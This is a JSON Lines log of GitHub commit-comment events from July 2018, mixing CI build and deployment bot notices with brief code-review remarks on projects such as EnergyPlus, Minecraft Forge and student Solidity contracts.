{"id":"7947259837","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665183,"position":null,"line":null,"path":null,"commit_id":"8e299231ae22b084b442c498ef8b07ccfd313cf1","created_at":"2018-07-11T01:39:59Z","updated_at":"2018-07-11T01:39:59Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2329 of 2329 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T01:39:59Z"}
{"id":"7947260176","type":"CommitCommentEvent","actor":{"login":"bigdragonsoft"},"repo":{"name":"bigdragonsoft/bigdragonsoft.github.io"},"payload":{"comment":{"id":29665184,"position":null,"line":null,"path":null,"commit_id":"fb586737ca991f62536ef5e72b522077bd0271e2","created_at":"2018-07-11T01:40:06Z","updated_at":"2018-07-11T01:40:06Z","author_association":"OWNER","body":"goback"}},"created_at":"2018-07-11T01:40:06Z"}
{"id":"7947263569","type":"CommitCommentEvent","actor":{"login":"xHalo921"},"repo":{"name":"FantisticFiveCPU/cpu1.1"},"payload":{"comment":{"id":29665188,"position":null,"line":null,"path":null,"commit_id":"84e97b653de885a8222d818426e1df8f91211a05","created_at":"2018-07-11T01:41:23Z","updated_at":"2018-07-11T01:41:23Z","author_association":"CONTRIBUTOR","body":"Ex_Mem寄存器"}},"created_at":"2018-07-11T01:41:23Z"}
{"id":"7947264646","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29665191,"position":14,"line":149,"path":"02-spatial-data.Rmd","commit_id":"e8b563e6c7e1f7b9c7509372a5e58192f592559c","created_at":"2018-07-11T01:41:48Z","updated_at":"2018-07-11T01:41:48Z","author_association":"OWNER","body":"Thanks for confirming, the section is definitely tighter now. Always room for improvement but priority is to complete new content and triage stuff like the figures :+1: "}},"created_at":"2018-07-11T01:41:48Z"}
{"id":"7947265605","type":"CommitCommentEvent","actor":{"login":"twopairs"},"repo":{"name":"cloud-pi/minio"},"payload":{"comment":{"id":29665194,"position":8,"line":8,"path":"cmd/gateway/gage/pkg/metadb/fdb.go","commit_id":"19db84e32f5ffc170dc6bcf76f18c1ce3bac42fb","created_at":"2018-07-11T01:42:12Z","updated_at":"2018-07-11T01:42:12Z","author_association":"NONE","body":"How about manage version also, like fbdclient520\r\nBecause i am not sure api have compatibility among versions or not"}},"created_at":"2018-07-11T01:42:12Z"}
{"id":"7947269118","type":"CommitCommentEvent","actor":{"login":"mbryne"},"repo":{"name":"adafruit/FifteenStep"},"payload":{"comment":{"id":29665201,"position":null,"line":null,"path":null,"commit_id":"7a953231f88eb8748acd6870c30325111f7902c8","created_at":"2018-07-11T01:43:34Z","updated_at":"2018-07-11T01:43:34Z","author_association":"NONE","body":"I know it's been awhile but can I ask the same question, what happened with the midi clock?"}},"created_at":"2018-07-11T01:43:34Z"}
{"id":"7947270300","type":"CommitCommentEvent","actor":{"login":"klypz"},"repo":{"name":"klypz/Core"},"payload":{"comment":{"id":29665203,"position":null,"line":null,"path":null,"commit_id":"92fd11d5bcab8bbd12796b1f5ab3657e20cd6df5","created_at":"2018-07-11T01:44:02Z","updated_at":"2018-07-11T01:44:02Z","author_association":"OWNER","body":"Commit inicial"}},"created_at":"2018-07-11T01:44:02Z"}
{"id":"7947272440","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665207,"position":null,"line":null,"path":null,"commit_id":"8e299231ae22b084b442c498ef8b07ccfd313cf1","created_at":"2018-07-11T01:44:53Z","updated_at":"2018-07-11T01:44:53Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T01:44:53Z"}
{"id":"7947276237","type":"CommitCommentEvent","actor":{"login":"skyLiao"},"repo":{"name":"bifan-wei/HwTxtReader"},"payload":{"comment":{"id":29665214,"position":null,"line":null,"path":null,"commit_id":"1df21ce17772351c0ea3f63873c897e2e5f17ad4","created_at":"2018-07-11T01:46:20Z","updated_at":"2018-07-11T01:46:20Z","author_association":"NONE","body":"修复异步任务回调造成空指针异常"}},"created_at":"2018-07-11T01:46:20Z"}
{"id":"7947280066","type":"CommitCommentEvent","actor":{"login":"cpw"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":29665219,"position":null,"line":null,"path":null,"commit_id":"fe3478f233e9b3934ddc80330cb0f333b0a7ea1a","created_at":"2018-07-11T01:47:48Z","updated_at":"2018-07-11T01:47:48Z","author_association":"CONTRIBUTOR","body":"This commit breaks minecart with chest teleportation between worlds. Vanilla portals don't teleport at all (the entity is lost completely), and non-vanilla portals that were working correctly on 2649 (e.g. draconic evolution's portals) are now dumping chest cart contents before teleportation."}},"created_at":"2018-07-11T01:47:48Z"}
{"id":"7947282097","type":"CommitCommentEvent","actor":{"login":"hacker1024"},"repo":{"name":"ResurrectionRemix-Devices/device_xiaomi_msm8996-common"},"payload":{"comment":{"id":29665221,"position":null,"line":null,"path":null,"commit_id":"b4bfb6cf7d9206d1cdab00fa89a098b1943f6bc0","created_at":"2018-07-11T01:48:35Z","updated_at":"2018-07-11T01:48:35Z","author_association":"MEMBER","body":"This also causes bootloops."}},"created_at":"2018-07-11T01:48:35Z"}
{"id":"7947284805","type":"CommitCommentEvent","actor":{"login":"jnifir"},"repo":{"name":"jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590"},"payload":{"comment":{"id":29665229,"position":null,"line":null,"path":null,"commit_id":"fd98737775da48db52204fa1d3e41706240fb193","created_at":"2018-07-11T01:49:39Z","updated_at":"2018-07-11T01:49:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/31b2156f-c5d9-4c6e-b219-f21ce41469d1?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180703135929590\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bb33ba73-a7ad-4885-95ea-6f8aca4921f1?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180703135929590\") deployed [sample-cloud-native-toolchain-tutorial-20180703135929590](https://github.com/jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590/releases/tag/deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-test-20180711-014939 \"deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-test-20180711-014939\") to [test](https://console.bluemix.net/apps/f30dca09-3d29-4b3d-ae55-0656b6a690a6?env_id=ibm:yp:us-south \"ibm:yp:us-south:jennifer_wales@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-11T01:49:39Z"}
{"id":"7947286989","type":"CommitCommentEvent","actor":{"login":"arkmoon"},"repo":{"name":"mdbootstrap/bootstrap-material-design"},"payload":{"comment":{"id":29665233,"position":5,"line":154,"path":"scss/core/_variables.scss","commit_id":"ef43a688de6750b3c26f7eabd150c4cd49c72518","created_at":"2018-07-11T01:50:29Z","updated_at":"2018-07-11T01:50:29Z","author_association":"NONE","body":"This is currently causing build failures because it's going up two directories outside of the project folder. Also, having the 'img/' forward slash here at the end results in it rendering image paths like this: '../../img//overlay01.png'. Can this be fixed to look like this, please?\r\n`$image-path: \"../img\" !default;`"}},"created_at":"2018-07-11T01:50:29Z"}
{"id":"7947290578","type":"CommitCommentEvent","actor":{"login":"MajorCooke"},"repo":{"name":"OrdinaryMagician/icantbelieveitsnothudmsg_m"},"payload":{"comment":{"id":29665240,"position":null,"line":null,"path":null,"commit_id":"c258ff9c100435be804563fb513449507692f3c8","created_at":"2018-07-11T01:51:52Z","updated_at":"2018-07-11T01:51:52Z","author_association":"NONE","body":"Since this is in GZDoom now I think this is no longer relevant."}},"created_at":"2018-07-11T01:51:52Z"}
{"id":"7947292743","type":"CommitCommentEvent","actor":{"login":"2016dengwei"},"repo":{"name":"2016dengwei/2018wd"},"payload":{"comment":{"id":29665248,"position":null,"line":null,"path":null,"commit_id":"13e1eef45c04134f680299d4dc6ec8e591bc6bae","created_at":"2018-07-11T01:52:43Z","updated_at":"2018-07-11T01:52:43Z","author_association":"OWNER","body":"read idle notification for weekly summary"}},"created_at":"2018-07-11T01:52:43Z"}
{"id":"7947293628","type":"CommitCommentEvent","actor":{"login":"famz"},"repo":{"name":"famz/linux"},"payload":{"comment":{"id":29665249,"position":null,"line":null,"path":null,"commit_id":"e0f636133171f1e492228bdccd01cb8ba5283a67","created_at":"2018-07-11T01:53:04Z","updated_at":"2018-07-11T01:53:04Z","author_association":"OWNER","body":"I haven't worked on this any more. QEMU resorted to `ppoll` for timeout precision."}},"created_at":"2018-07-11T01:53:04Z"}
{"id":"7947294895","type":"CommitCommentEvent","actor":{"login":"erickzanardo"},"repo":{"name":"erickzanardo/flame"},"payload":{"comment":{"id":29665252,"position":47,"line":47,"path":"lib/gamepad.dart","commit_id":"c292535c992438fc10ae6aaa3142c5d554a6a2f8","created_at":"2018-07-11T01:53:33Z","updated_at":"2018-07-11T01:53:33Z","author_association":"OWNER","body":"typo"}},"created_at":"2018-07-11T01:53:33Z"}
{"id":"7947297180","type":"CommitCommentEvent","actor":{"login":"jnifir"},"repo":{"name":"jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590"},"payload":{"comment":{"id":29665255,"position":null,"line":null,"path":null,"commit_id":"fd98737775da48db52204fa1d3e41706240fb193","created_at":"2018-07-11T01:54:28Z","updated_at":"2018-07-11T01:54:28Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/31b2156f-c5d9-4c6e-b219-f21ce41469d1?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180703135929590\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bb33ba73-a7ad-4885-95ea-6f8aca4921f1?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180703135929590\") deployed [sample-cloud-native-toolchain-tutorial-20180703135929590](https://github.com/jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590/releases/tag/deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-prod-20180711-015427 \"deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-prod-20180711-015427\") to [prod](https://console.bluemix.net/apps/3662ff31-1dc0-4f23-a002-50f08b9d8e8f?env_id=ibm:yp:us-south \"ibm:yp:us-south:jennifer_wales@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-11T01:54:28Z"}
{"id":"7947299064","type":"CommitCommentEvent","actor":{"login":"ManiShahDesigns"},"repo":{"name":"ManiShahDesigns/tipcal"},"payload":{"comment":{"id":29665258,"position":null,"line":null,"path":null,"commit_id":"005fef8dfe68225e26503b51a0f7a6c31db07e37","created_at":"2018-07-11T01:55:11Z","updated_at":"2018-07-11T01:55:11Z","author_association":"OWNER","body":"JS project"}},"created_at":"2018-07-11T01:55:11Z"}
{"id":"7947299224","type":"CommitCommentEvent","actor":{"login":"rshelar"},"repo":{"name":"rshelar/nodejs-docs-samples"},"payload":{"comment":{"id":29665259,"position":null,"line":null,"path":null,"commit_id":"52caacb95d9f4909c00d6ebc1cb2801226cc1091","created_at":"2018-07-11T01:55:14Z","updated_at":"2018-07-11T01:55:14Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-11T01:55:14Z"}
{"id":"7947300572","type":"CommitCommentEvent","actor":{"login":"karagenit"},"repo":{"name":"frc868/2018-robot"},"payload":{"comment":{"id":29665261,"position":4,"line":113,"path":"src/com/techhounds/Robot.java","commit_id":"ae69ff716f735b0e9b244a0c10fb50a40210c694","created_at":"2018-07-11T01:55:45Z","updated_at":"2018-07-11T01:55:45Z","author_association":"MEMBER","body":"Probably can delete this now."}},"created_at":"2018-07-11T01:55:45Z"}
{"id":"7947304186","type":"CommitCommentEvent","actor":{"login":"karagenit"},"repo":{"name":"frc868/2018-robot"},"payload":{"comment":{"id":29665270,"position":5,"line":27,"path":"src/com/techhounds/powerpack/PowerPack.java","commit_id":"ae69ff716f735b0e9b244a0c10fb50a40210c694","created_at":"2018-07-11T01:57:08Z","updated_at":"2018-07-11T01:57:08Z","author_association":"MEMBER","body":"Same with all of these."}},"created_at":"2018-07-11T01:57:08Z"}
{"id":"7947307059","type":"CommitCommentEvent","actor":{"login":"jolting"},"repo":{"name":"MRPT/mrpt-web"},"payload":{"comment":{"id":29665275,"position":null,"line":null,"path":null,"commit_id":"89018706390beb3c4cc03e2bd92a498f966415e2","created_at":"2018-07-11T01:58:11Z","updated_at":"2018-07-11T01:58:11Z","author_association":"MEMBER","body":"Good catch. All js arrays have a length property.  Jsoncpp used size(). I'm always fascinated by differences in language idioms. "}},"created_at":"2018-07-11T01:58:11Z"}
{"id":"7947311559","type":"CommitCommentEvent","actor":{"login":"sirhcybe"},"repo":{"name":"sirhcybe/FARMSInternationalSite"},"payload":{"comment":{"id":29665282,"position":null,"line":null,"path":null,"commit_id":"6d365616758bcc755acfc767188af5efaefc0d3a","created_at":"2018-07-11T01:59:59Z","updated_at":"2018-07-11T01:59:59Z","author_association":"OWNER","body":"Great job!"}},"created_at":"2018-07-11T01:59:59Z"}
{"id":"7949034669","type":"CommitCommentEvent","actor":{"login":"sanketrajgarhia"},"repo":{"name":"udacity/create-your-own-adventure"},"payload":{"comment":{"id":29668670,"position":null,"line":null,"path":null,"commit_id":"fdcb54fc5a39f2d049f3750ec46da96489b48752","created_at":"2018-07-11T10:00:20Z","updated_at":"2018-07-11T10:00:20Z","author_association":"NONE","body":"Please review this, @casey-collab"}},"created_at":"2018-07-11T10:00:20Z"}
{"id":"7949035117","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29668673,"position":27,"line":12,"path":"contracts/RockPaperScissors.sol","commit_id":"b519f5f5af99b419d90c8e9e86b010ad770785ca","created_at":"2018-07-11T10:00:24Z","updated_at":"2018-07-11T10:00:24Z","author_association":"NONE","body":"For readability, you should consistently have a space after the `,`."}},"created_at":"2018-07-11T10:00:24Z"}
{"id":"7949035861","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29668676,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-11T10:00:31Z","updated_at":"2018-07-11T10:00:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T10:00:31Z"}
{"id":"7949035980","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29668678,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-11T10:00:32Z","updated_at":"2018-07-11T10:00:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T10:00:32Z"}
{"id":"7949037720","type":"CommitCommentEvent","actor":{"login":"tombh"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29668684,"position":null,"line":null,"path":null,"commit_id":"24c49213e214cd89c3d846ece0745f210069f945","created_at":"2018-07-11T10:00:50Z","updated_at":"2018-07-11T10:00:50Z","author_association":"MEMBER","body":"Yes, could well be the case :(\r\n\r\nThe reason I decide to make the commit is to save me having to do it when ESR does eventually get updated.\r\n\r\nThanks :)"}},"created_at":"2018-07-11T10:00:50Z"}
{"id":"7949038069","type":"CommitCommentEvent","actor":{"login":"forspy"},"repo":{"name":"forspy/share"},"payload":{"comment":{"id":29668685,"position":null,"line":null,"path":null,"commit_id":"6775edac6dc5d62f4e68c63867bbb0d01b242e88","created_at":"2018-07-11T10:00:54Z","updated_at":"2018-07-11T10:00:54Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-11T10:00:54Z"}
{"id":"7949041869","type":"CommitCommentEvent","actor":{"login":"zapladazol"},"repo":{"name":"zapladazol/ruby"},"payload":{"comment":{"id":29668686,"position":14,"line":32,"path":"benchmark/README.md","commit_id":"3e93bf3b46c42a41fee95fea5d0679e3ac180c1c","created_at":"2018-07-11T10:01:35Z","updated_at":"2018-07-11T10:01:35Z","author_association":"OWNER","body":"- $ benchmark-driver --help\r\n- Использование: контрольный драйвер [опции] [YAML | RUBY]\r\n-     -r, --runner [TYPE] Укажите тип бегуна: ips, время, память, один раз (по умолчанию: ips)\r\n-     -o, --output [TYPE] Укажите тип вывода: сравнить, просто, уценка, запись (по умолчанию: сравнить)\r\n-     -e, --executables [EXECS] Ruby исполняемые файлы (e1 :: path1, arg1, ...; e2 :: path2, arg2; ...)\r\n-         --rbenv [VERSIONS] Ruby исполняемые файлы в rbenv (xxx, arg1, ...; yyy, arg2, ...; ...)\r\n-         --repeat-count [NUM] Попробуйте тест NUM раз и используйте самый быстрый результат или наихудшее использование памяти\r\n-         --repeat-result [TYPE] Получите «лучший», «средний» или «худший» результат с --repeat-count (по умолчанию: best)"}},"created_at":"2018-07-11T10:01:35Z"}
{"id":"7949044620","type":"CommitCommentEvent","actor":{"login":"andyli"},"repo":{"name":"HaxeFoundation/haxelib"},"payload":{"comment":{"id":29668688,"position":null,"line":null,"path":null,"commit_id":"967eb24de5684d5676a9dbf6b3f29abda7e594ce","created_at":"2018-07-11T10:02:06Z","updated_at":"2018-07-11T10:02:06Z","author_association":"MEMBER","body":"hmm... It doesn't look right in staging. Will fix it tonight or tmr."}},"created_at":"2018-07-11T10:02:06Z"}
{"id":"7949046253","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29668694,"position":37,"line":20,"path":"contracts/RockPaperScissors.sol","commit_id":"b519f5f5af99b419d90c8e9e86b010ad770785ca","created_at":"2018-07-11T10:02:24Z","updated_at":"2018-07-11T10:02:24Z","author_association":"NONE","body":"Here also, you could consistently have `){` or `) {`."}},"created_at":"2018-07-11T10:02:24Z"}
{"id":"7949048730","type":"CommitCommentEvent","actor":{"login":"sarojkh"},"repo":{"name":"amitness/dotfiles"},"payload":{"comment":{"id":29668699,"position":null,"line":null,"path":null,"commit_id":"88b1991394829e2062ed76ef2270b6000a62fd60","created_at":"2018-07-11T10:02:52Z","updated_at":"2018-07-11T10:02:52Z","author_association":"NONE","body":"Thanks! I need this. \r\n"}},"created_at":"2018-07-11T10:02:52Z"}
{"id":"7949049374","type":"CommitCommentEvent","actor":{"login":"nl8590687"},"repo":{"name":"nl8590687/ASRT_SpeechRecognition"},"payload":{"comment":{"id":29668705,"position":null,"line":null,"path":null,"commit_id":"9d40bb7f242f99933ebaedb2c0dc08f38c8fb207","created_at":"2018-07-11T10:03:00Z","updated_at":"2018-07-11T10:03:00Z","author_association":"OWNER","body":"多了两个卷积层一个池化层"}},"created_at":"2018-07-11T10:03:00Z"}
{"id":"7949050642","type":"CommitCommentEvent","actor":{"login":"sarojkh"},"repo":{"name":"amitness/dotfiles"},"payload":{"comment":{"id":29668707,"position":null,"line":null,"path":null,"commit_id":"88b1991394829e2062ed76ef2270b6000a62fd60","created_at":"2018-07-11T10:03:15Z","updated_at":"2018-07-11T10:03:15Z","author_association":"NONE","body":"@amitness Thanks! I needed these. \r\n"}},"created_at":"2018-07-11T10:03:15Z"}
{"id":"7949052030","type":"CommitCommentEvent","actor":{"login":"byelenin"},"repo":{"name":"MetricsNJU/Metrics_2018"},"payload":{"comment":{"id":29668710,"position":null,"line":null,"path":null,"commit_id":"8c22e07b8327e0ddda847463f646440ab867dbfc","created_at":"2018-07-11T10:03:30Z","updated_at":"2018-07-11T10:03:30Z","author_association":"CONTRIBUTOR","body":"Well done!  You are awsome. And maybe we could make the web more beautiful and friendly in the next move. "}},"created_at":"2018-07-11T10:03:30Z"}
{"id":"7949052232","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29668711,"position":65,"line":47,"path":"contracts/RockPaperScissors.sol","commit_id":"b519f5f5af99b419d90c8e9e86b010ad770785ca","created_at":"2018-07-11T10:03:32Z","updated_at":"2018-07-11T10:03:32Z","author_association":"NONE","body":"Not sure what this `1` is."}},"created_at":"2018-07-11T10:03:32Z"}
{"id":"7949055076","type":"CommitCommentEvent","actor":{"login":"Auro77"},"repo":{"name":"Auro77/Hackerrank"},"payload":{"comment":{"id":29668716,"position":null,"line":null,"path":null,"commit_id":"ca7d4f5f3842c475cab141edd6954b9ec46c6e5c","created_at":"2018-07-11T10:04:05Z","updated_at":"2018-07-11T10:04:05Z","author_association":"OWNER","body":"js10-data"}},"created_at":"2018-07-11T10:04:05Z"}
{"id":"7949059966","type":"CommitCommentEvent","actor":{"login":"2pay"},"repo":{"name":"HowToCloneAnAltcoin/Clonecoin"},"payload":{"comment":{"id":29668725,"position":null,"line":null,"path":null,"commit_id":"95d0bef6e6a7bf27f3ed6d8153fccf8275524ba9","created_at":"2018-07-11T10:05:02Z","updated_at":"2018-07-11T10:05:02Z","author_association":"NONE","body":"in version 0.16.0 change version in file: configure.ac\r\nLine `3 to 6`"}},"created_at":"2018-07-11T10:05:02Z"}
{"id":"7949069519","type":"CommitCommentEvent","actor":{"login":"kushwahAjay"},"repo":{"name":"kushwahAjay/Patterns"},"payload":{"comment":{"id":29668743,"position":null,"line":null,"path":null,"commit_id":"8479dc0d0f0c984dbc3150b0541007a5fc264546","created_at":"2018-07-11T10:06:49Z","updated_at":"2018-07-11T10:06:49Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-11T10:06:49Z"}
{"id":"7949072419","type":"CommitCommentEvent","actor":{"login":"peternewman"},"repo":{"name":"OpenLightingProject/ola"},"payload":{"comment":{"id":29668745,"position":6,"line":9,"path":"libola.pc.in","commit_id":"bcff9c884cf59c1a86a7495235cb9cd988cb0e50","created_at":"2018-07-11T10:07:24Z","updated_at":"2018-07-11T10:07:24Z","author_association":"MEMBER","body":"Is there any reason we can't do this to libolaserver.pc.in too @nomis52 ?"}},"created_at":"2018-07-11T10:07:24Z"}
{"id":"7949076102","type":"CommitCommentEvent","actor":{"login":"chandrika46"},"repo":{"name":"chandrika46/code1"},"payload":{"comment":{"id":29668754,"position":3,"line":3,"path":"Readme.txt","commit_id":"aaa5ac29f03641c5128d3480ab276a78485bd8c3","created_at":"2018-07-11T10:08:09Z","updated_at":"2018-07-11T10:08:09Z","author_association":"OWNER","body":"chabf"}},"created_at":"2018-07-11T10:08:09Z"}
{"id":"7949082453","type":"CommitCommentEvent","actor":{"login":"2pay"},"repo":{"name":"HowToCloneAnAltcoin/Clonecoin"},"payload":{"comment":{"id":29668764,"position":null,"line":null,"path":null,"commit_id":"9a5321bfb9b0482ed3b435edb815d8eee268b949","created_at":"2018-07-11T10:09:24Z","updated_at":"2018-07-11T10:09:24Z","author_association":"NONE","body":"First build when run ./coind copy address and backup wallet.dat."}},"created_at":"2018-07-11T10:09:24Z"}
{"id":"7949083188","type":"CommitCommentEvent","actor":{"login":"poet4life"},"repo":{"name":"poet4life/github-pages-with-jekyll"},"payload":{"comment":{"id":29668767,"position":null,"line":null,"path":null,"commit_id":"5f1fbc27c8efacf47dcb3f63bc923a4d285180b7","created_at":"2018-07-11T10:09:33Z","updated_at":"2018-07-11T10:09:33Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-11T10:09:33Z"}
{"id":"7949086229","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29668771,"position":80,"line":67,"path":"contracts/RockPaperScissors.sol","commit_id":"b519f5f5af99b419d90c8e9e86b010ad770785ca","created_at":"2018-07-11T10:10:11Z","updated_at":"2018-07-11T10:10:11Z","author_association":"NONE","body":"So if player1 sees that player2 submits the known hash of a move that makes player1 lose, player1 can race ahead and `requestCancel`?"}},"created_at":"2018-07-11T10:10:11Z"}
{"id":"7949101512","type":"CommitCommentEvent","actor":{"login":"winthesky"},"repo":{"name":"winthesky/maxj-thesis"},"payload":{"comment":{"id":29668790,"position":null,"line":null,"path":null,"commit_id":"7658f8fc7d3ee1e3141669ea3309b5eaaa5a0ac4","created_at":"2018-07-11T10:13:18Z","updated_at":"2018-07-11T10:13:18Z","author_association":"OWNER","body":"彻底删除"}},"created_at":"2018-07-11T10:13:18Z"}
{"id":"7949108021","type":"CommitCommentEvent","actor":{"login":"superkunn"},"repo":{"name":"superkunn/acm"},"payload":{"comment":{"id":29668801,"position":null,"line":null,"path":null,"commit_id":"2c11171d0eac014651cef1511c12a6140538c1f5","created_at":"2018-07-11T10:14:39Z","updated_at":"2018-07-11T10:14:39Z","author_association":"OWNER","body":"tot 8"}},"created_at":"2018-07-11T10:14:39Z"}
{"id":"7949109280","type":"CommitCommentEvent","actor":{"login":"RobertTieso"},"repo":{"name":"RobertTieso/portfolio"},"payload":{"comment":{"id":29668802,"position":null,"line":null,"path":null,"commit_id":"0614bdd2a5204e37f96c5cd678124056e8d3e17b","created_at":"2018-07-11T10:14:54Z","updated_at":"2018-07-11T10:14:54Z","author_association":"OWNER","body":"Delete"}},"created_at":"2018-07-11T10:14:54Z"}
{"id":"7949117879","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29668825,"position":51,"line":50,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T10:16:32Z","updated_at":"2018-07-11T10:16:32Z","author_association":"NONE","body":"Weirdly, one of our former students found out that 2 `require`s cost less gas than 1 with an `&&` inside."}},"created_at":"2018-07-11T10:16:32Z"}
{"id":"7949123323","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29668834,"position":null,"line":null,"path":null,"commit_id":"deb3c72da775510bc6fd356f5f6b712bb8bc08d8","created_at":"2018-07-11T10:17:36Z","updated_at":"2018-07-11T10:17:36Z","author_association":"MEMBER","body":"maybe better: \"set up a local C<%*SUB-MAIN-OPTS>\" ?"}},"created_at":"2018-07-11T10:17:36Z"}
{"id":"7949123838","type":"CommitCommentEvent","actor":{"login":"sarojkh"},"repo":{"name":"amitness/dotfiles"},"payload":{"comment":{"id":29668837,"position":null,"line":null,"path":null,"commit_id":"88b1991394829e2062ed76ef2270b6000a62fd60","created_at":"2018-07-11T10:17:43Z","updated_at":"2018-07-11T10:17:43Z","author_association":"NONE","body":"@amitness Too bad. `ip` utility not available in macOS. Used different utilities that come with macOS to achieve these. Thanks anyways!"}},"created_at":"2018-07-11T10:17:43Z"}
{"id":"7949126461","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29668842,"position":79,"line":68,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T10:18:13Z","updated_at":"2018-07-11T10:18:13Z","author_association":"NONE","body":"The requirements are left to wide interpretation. As per your code, after the deadline, Alice and Carol are in competition: the first to send a tx gets the Ether. Not a big issue, just an uncertainty."}},"created_at":"2018-07-11T10:18:13Z"}
